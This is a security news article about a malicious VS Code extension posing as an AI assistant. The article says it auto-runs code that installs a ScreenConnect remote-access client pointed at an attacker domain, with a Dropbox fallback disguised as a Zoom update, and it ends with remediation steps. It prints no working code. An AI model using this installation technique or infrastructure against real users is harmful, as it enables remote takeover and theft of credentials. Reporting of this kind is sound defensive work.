Malicious ‘ClawdBot Agent’ VS Code Extension Deploys ScreenConnect RAT
A new cybersecurity threat has emerged targeting developers through a malicious Visual Studio Code (VS Code) extension named ClawdBot Agent. Discovered on January 27, 2026, this extension masquerades as a legitimate AI-powered assistant but conceals a harmful payload designed to compromise user systems.
Deceptive Appearance and Functionality
The ClawdBot Agent extension presents itself as an AI assistant, integrating with well-known AI providers such as OpenAI, Anthropic, and Google. This functionality creates a false sense of security among users, as the extension appears to perform as advertised. However, unlike the genuine Clawdbot service, which has not released an official VS Code extension, this fraudulent version successfully registered the name first, deceiving users into installation.
Immediate Malicious Activity
Upon installation, the extension initiates its attack by silently deploying malware onto Windows machines without user knowledge or consent. Security monitoring systems detected unusual activity immediately after VS Code was launched with the extension installed. Microsoft responded swiftly to reports of the malicious extension, removing it from the VS Code Marketplace to prevent further infections.
Technical Analysis and Infection Mechanism
Security analysts from Aikido conducted a detailed investigation, revealing that the extension contains code designed to execute automatically each time VS Code starts. This JavaScript code establishes a connection to an external server to fetch configuration instructions, which then download and execute multiple malicious files disguised as legitimate system components.
Deployment of ScreenConnect RAT
A particularly concerning aspect of this attack is the weaponization of legitimate remote access software. The malicious extension deploys ScreenConnect, a trusted IT support tool, configured to communicate with attacker-controlled servers at meeting.bulletmailer.net on port 8041. The attackers set up their own ScreenConnect relay server and pre-configured client installers, distributing them through the VS Code extension. As a result, victims unknowingly install a fully functional ScreenConnect client that immediately establishes remote connections to the attackers’ infrastructure.
Redundant Delivery Mechanisms
To ensure the success of their attack, the perpetrators employed multiple fallback mechanisms. A Rust-based DLL file provides redundant delivery capability by fetching backup payloads from Dropbox, disguised as a Zoom update. This multi-layered approach demonstrates sophisticated operational planning, ensuring the malware remains effective even if primary command-and-control servers are disabled.
Recommendations for Affected Users
Users who have installed the ClawdBot Agent extension should take immediate action to mitigate potential damage:
– Uninstall the Malicious Extension: Remove the ClawdBot Agent extension from VS Code to prevent further malicious activity.
– Remove ScreenConnect: Uninstall ScreenConnect from your system to eliminate unauthorized remote access capabilities.
– Block Malicious Domains: Implement network-level blocks for the infrastructure domains associated with the attack, such as meeting.bulletmailer.net.
– Rotate API Keys: Change API keys for any AI services accessed through the extension to prevent unauthorized use.
Broader Implications and Preventative Measures
This incident underscores the critical importance of verifying the authenticity of extensions before installation. Developers should exercise caution and adhere to best practices to protect their systems:
– Verify Extension Sources: Ensure that extensions are obtained from reputable sources and have been reviewed by the community.
– Monitor System Activity: Regularly check for unusual system behavior that may indicate malicious activity.
– Keep Software Updated: Maintain up-to-date software to benefit from the latest security patches and protections.
By remaining vigilant and implementing these measures, developers can safeguard their environments against similar threats in the future.
